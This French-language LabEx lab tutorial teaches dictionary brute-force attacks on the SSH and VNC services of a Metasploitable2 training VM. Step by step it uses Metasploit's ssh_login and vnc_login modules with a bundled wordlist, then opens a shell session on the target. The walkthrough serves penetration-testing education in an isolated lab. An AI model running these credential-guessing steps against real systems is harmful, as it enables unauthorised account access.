Introduction
Dans ce laboratoire, vous apprendrez à effectuer des attaques de force brute contre les services d'authentification par mot de passe faibles. Si un service réseau nécessite une autorisation pour y accéder et que le mécanisme d'autorisation repose sur des noms d'utilisateur et des mots de passe, les vulnérabilités liées aux mots de passe faibles peuvent devenir une cible d'attaque courante. Ce type de vulnérabilité est généralement causé par les utilisateurs qui configurent des mots de passe faibles, comme "123456".
La méthode la plus directe pour exploiter les mots de passe faibles consiste à utiliser une attaque de force brute basée sur un dictionnaire. Le fichier de dictionnaire contenant les noms d'utilisateur et les mots de passe potentiels est crucial dans cette attaque. L'attaquant tente de se connecter en utilisant les combinaisons de noms d'utilisateur et de mots de passe du dictionnaire jusqu'à ce qu'une connexion réussisse.
Dans ce laboratoire, vous utiliserez le terminal du Metasploit Framework (MSF) dans l'environnement Kali Linux sur la plateforme LabEx pour effectuer des attaques de force brute contre les services SSH et VNC de la machine cible Metasploitable2.
Remarque : Les instances cloud utilisées dans ce laboratoire sont limitées en nombre en raison de contraintes de coût. Veuillez vous assurer de démarrer l'environnement de laboratoire seulement lorsque vous avez suffisamment de temps pour terminer les exercices, afin d'éviter de gaspiller les instances.
Comprendre l'environnement
Dans cette étape, vous apprendrez à connaître l'environnement de laboratoire et les conditions préalables pour effectuer les attaques de force brute.
L'environnement de laboratoire se compose de deux composants :
- Machine d'attaque : Un conteneur Kali Linux qui doit être démarré à l'aide de la commande
dockeret accessible via le shellbash. - Machine cible : Une machine virtuelle Metasploitable2 avec le nom d'hôte
targetet l'adresse IP192.168.122.102. Le nom d'utilisateur et le mot de passe par défaut de cette machine sontmsfadmin/msfadmin. Cette machine doit être démarrée à l'aide du système de gestion de machines virtuelles Libvirt.
Les attaques seront menées depuis l'environnement Kali Linux en utilisant le Metasploit Framework (MSF) contre la machine cible.
Pour démarrer l'environnement de laboratoire, suivez ces étapes :
Lancez un terminal XFCE sur la machine hôte LabEx (bureau Ubuntu).
Démarrez la machine cible Metasploitable2 en utilisant la commande suivante :
sudo virsh start Metasploitable2
Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.
- Testez la connectivité à la machine cible en utilisant la commande
ping(vous pouvez utiliserCtrl+Cpour arrêter le ping) :
ping 192.168.122.102
- Démarrez le conteneur Kali Linux et entrez dans le shell
bashen utilisant la commande suivante :
docker run -ti --network host b5b709a49cd5 bash
- Testez la connectivité réseau depuis le conteneur Kali vers la machine cible en utilisant la commande
ping(vous pouvez utiliserCtrl+Cpour arrêter le ping) :
ping 192.168.122.102
Maintenant, la machine d'attaque (conteneur Kali) et la machine cible (Metasploitable2) sont en cours d'exécution, et vous pouvez procéder aux attaques de force brute.
Remarque : Si vous quittez accidentellement le shell bash, le conteneur Kali s'arrêtera. Vous pouvez redémarrer un nouveau conteneur Kali et entrer à nouveau dans le shell bash en exécutant la commande docker run -ti --network host b5b709a49cd5 bash sur la machine hôte LabEx.
Force brute sur SSH
Dans cette étape, vous apprendrez à effectuer une attaque de force brute contre le service SSH de la machine cible Metasploitable2 en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux.
- Sur le conteneur Kali Linux, lancez la console Metasploit :
cd ~
msfconsole
- Dans la console Metasploit, utilisez le module
auxiliary/scanner/ssh/ssh_loginpour l'attaque de force brute contre SSH :
use auxiliary/scanner/ssh/ssh_login
- Configurez les options requises pour l'attaque :
- Définissez l'hôte cible :
set rhosts 192.168.122.102
- Définissez le fichier de dictionnaire de mots de passe (vous pouvez utiliser le fichier
/usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txtfourni) :
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
- Réglez la verbosité sur
falsepour éviter une sortie excessive :
set verbose false
- Vérifiez les options configurées :
show options
- Lancez l'attaque de force brute :
exploit
L'attaque commencera, en tentant de se connecter au service SSH en utilisant les combinaisons de noms d'utilisateur et de mots de passe du fichier de dictionnaire spécifié. Une fois une connexion réussie trouvée, les identifiants correspondants seront affichés.
Remarque : Le processus de force brute peut prendre beaucoup de temps. Vous pouvez interrompre le processus en appuyant sur Ctrl+C après l'affichage de la première connexion réussie, si vous le souhaitez.
Une fois une connexion réussie trouvée, le script d'attaque créera automatiquement une session SSH. Vous pouvez basculer vers la session en utilisant la commande
sessions -i <session_id>, où<session_id>est l'identifiant de session affiché dans la sortie.Dans la session SSH, vous pouvez exécuter diverses commandes sur la machine cible.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Force brute sur VNC
Dans cette étape, vous apprendrez à effectuer une attaque de force brute contre le service VNC de la machine cible Metasploitable2 en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux.
- Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
- Dans la console Metasploit, utilisez le module
auxiliary/scanner/vnc/vnc_loginpour l'attaque de force brute contre VNC :
use auxiliary/scanner/vnc/vnc_login
- Configurez le nombre de threads pour l'attaque (plus il y a de threads, plus l'attaque sera rapide, mais cela peut également augmenter les chances d'être détecté) :
set THREADS 5
- Définissez l'adresse IP de l'hôte cible :
set RHOSTS 192.168.122.102
- Lancez l'attaque de force brute :
exploit
- Les résultats de l'attaque seront affichés rapidement, car la connexion VNC ne nécessite pas de nom d'utilisateur et ne teste que les mots de passe faibles courants.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Résumé
Dans ce laboratoire, vous avez appris à effectuer des attaques de force brute contre les services d'authentification par mot de passe faibles en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux. Plus précisément, vous avez mené des attaques de force brute contre les services SSH et VNC de la machine cible Metasploitable2.
Le laboratoire a couvert les concepts clés suivants :
- Comprendre l'environnement de laboratoire et les conditions préalables
- Configurer le Metasploit Framework pour les attaques de force brute
- Utiliser des fichiers de dictionnaire de mots de passe pour les attaques de force brute
- Effectuer des attaques de force brute contre le service SSH
- Analyser le script d'attaque de force brute SSH
- Effectuer des attaques de force brute contre le service VNC
Grâce à cette expérience pratique, vous avez acquis des connaissances et des compétences pratiques dans la réalisation d'attaques de force brute contre les services d'authentification par mot de passe faibles, ce qui est un aspect crucial des tests de pénétration et du hacking éthique.



